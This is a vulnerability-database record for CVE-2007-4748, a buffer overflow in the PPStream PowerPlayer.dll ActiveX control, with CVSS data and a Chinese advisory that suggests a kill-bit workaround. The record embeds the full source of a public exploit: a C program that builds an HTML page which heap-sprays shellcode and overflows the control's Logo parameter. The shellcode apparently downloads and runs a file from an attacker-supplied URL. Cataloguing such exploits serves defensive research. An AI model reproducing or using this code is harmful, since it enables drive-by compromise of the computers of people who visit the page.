ID OSVDB:38421
Type osvdb
Reporter OSVDB
Modified 2007-08-31T00:00:00
Description
No description provided by the source
References:
ISS X-Force ID: 36394
Generic Exploit URL: http://www.milw0rm.com/exploits/4348
CVE-2007-4748
Bugtraq ID: 25502
{"bulletinFamily": "software", "viewCount": 1, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 36394\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4348\n[CVE-2007-4748](https://vulners.com/cve/CVE-2007-4748)\nBugtraq ID: 25502\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "b3a0b3b400a2ebbee1f611c908f06f70"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "530aa9bfcb8b6baafad2e57dc5e63e64"}, {"key": "href", "hash": "c7c0254a0d44217b05db318164df27d0"}, {"key": "modified", "hash": "5f0548b8682eda9a0bf935bb46f9014d"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5f0548b8682eda9a0bf935bb46f9014d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "044bbe70db0fa31a25d390fc7220ef15"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:38421", "modified": "2007-08-31T00:00:00", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2017-04-28T13:20:34"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4748"]}, {"type": "seebug", "idList": ["SSV:11839"]}, {"type": "exploitdb", "idList": ["EDB-ID:4348"]}], "modified": "2017-04-28T13:20:34"}, "vulnersScore": 7.2}, "id": "OSVDB:38421", "title": "PPStream PowerPlayer.dll ActiveX Logo Variable Arbitrary Code Execution", "hash": "ad506ef7e55cf3cb9ff4f6451151b1ab6a0a0c595d88e822cf42559c8eed9db7", "edition": 1, "published": "2007-08-31T00:00:00", "type": "osvdb", "history": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2007-4748"], "lastseen": "2017-04-28T13:20:34"}
{"cve": [{"lastseen": "2019-05-29T18:09:01", "bulletinFamily": "NVD", "description": "Buffer overflow in the PowerPlayer.dll ActiveX control in PPStream 2.0.1.3829 allows remote attackers to execute arbitrary code via a long Logo parameter.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-4748", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4748", "published": "2007-09-06T22:17:00", "title": "CVE-2007-4748", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T20:42:57", "bulletinFamily": "exploit", "description": "PPStream (PowerPlayer.dll 2.0.1.3829) Activex Remote Overflow Exploit. CVE-2007-4748. Remote exploit for windows platform", "modified": "2007-08-31T00:00:00", "published": "2007-08-31T00:00:00", "id": "EDB-ID:4348", "href": "https://www.exploit-db.com/exploits/4348/", "type": "exploitdb", "title": "PPStream PowerPlayer.dll 2.0.1.3829 ActiveX Remote Overflow Exploit", "sourceData": "// author: dummy\n// written by dummyz@126.com (2007)\n\n#define _CRT_SECURE_NO_DEPRECATE\n\n#include <windows.h>\n#include <stdio.h>\n\nconst unsigned char shellcode[174] = \n{\n 0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A, \n 0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F, \n 0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1, \n 0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C, \n 0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41, \n 0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03, \n 0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B, \n 0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC, \n 0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB, \n 0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00, \n 0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90\n};\n\nconst char* script1 = \\\n \"<html><body><object id=\\\"ppc\\\" classid=\\\"clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458\\\"></object><script>\"\n \"var shellcode = unescape(\\\"\";\nconst char* script2 = \\\n \"\\\");\"\n \"bigblock = unescape(\\\"%u9090\\\");\"\n \"headersize = 20;\"\n \"slackspace = headersize + shellcode.length;\"\n \"while ( bigblock.length < slackspace ) bigblock += bigblock;\"\n \"fillblock = bigblock.substring(0, slackspace);\"\n \"block = bigblock.substring(0, bigblock.length - slackspace);\"\n \"while(block.length + slackspace < 0x40000) block = block + block + fillblock;\"\n \"memory = new Array();\"\n \"for (x=0; x< 400; x++) memory[x] = block + shellcode;\"\n \"var buffer = '\\\\x0a';\"\n \"while (buffer.length < 500) buffer += '\\\\x0a\\\\x0a\\\\x0a\\\\x0a';\"\n \"ppc.Logo = buffer;\"\n \"</script>\"\n \"</body>\"\n \"</html>\";\n\nint main(int argc, char* argv[])\n{\n if ( argc != 2 )\n {\n printf(\"ex:fuckpps url\\nwritten by dummyz@126.com (2007)\\n\");\n return -1;\n }\n\n FILE *file = fopen(\"fuckpps.html\", \"w+\");\n if ( file == NULL )\n {\n printf(\"create 'fuckpps.html' failed!\\n\");\n return -2;\n }\n\n fprintf(file, \"%s\", script1);\n for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )\n fprintf(file, \"%%u%02X%02X\" , shellcode[i + 1], shellcode[i]);\n \n const unsigned l = strlen(argv[1]);\n for ( unsigned j = 0; j < l; j += 2 )\n fprintf(file, \"%%u%02X%02X\" , argv[1][j + 1], argv[1][j]);\n\n fprintf(file, \"%s\", script2);\n fclose(file);\n\n printf(\"make 'fuckpps.html' successed!\\n\");\n\n return 0;\n}\n\n// milw0rm.com [2007-08-31]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4348/"}], "seebug": [{"lastseen": "2017-11-19T18:53:02", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 25502\r\nCVE(CAN) ID: CVE-2007-4748\r\n\r\nPPS\u7f51\u7edc\u7535\u89c6\uff08PPStream\uff09\u662f\u5168\u7403\u7b2c\u4e00\u5bb6\u96c6P2P\u76f4\u64ad\u70b9\u64ad\u4e8e\u4e00\u8eab\u7684\u7f51\u7edc\u7535\u89c6\u8f6f\u4ef6\u3002\r\n\r\nPPStream\u6240\u63d0\u4f9b\u7684PowerPlayer.dll ActiveX\u63a7\u4ef6\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1\u7528\u6237\u6240\u63d0\u4f9b\u7684Logo\u53c2\u6570\u3002\u5982\u679c\u7528\u6237\u53d7\u9a97\u8bbf\u95ee\u4e86\u6076\u610f\u7f51\u9875\u5e76\u4f20\u9001\u4e86\u8d85\u957f\u53c2\u6570\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nPPS\u7f51\u7edc\u89c6\u9891 PPStream 2.0.1.3829\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4e3aclsid\uff1a5EC7C511-CD0F-42E6-830C-1BD9882F3458\u8bbe\u7f6ekill bit\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPPS\u7f51\u7edc\u89c6\u9891\r\n-----------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.pps.tv", "modified": "2009-07-20T00:00:00", "published": "2009-07-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11839", "id": "SSV:11839", "title": "PPStream PowerPlayer.DLL ActiveX\u63a7\u4ef6\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n http://sebug.net/exploit/7210/\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-11839"}]}
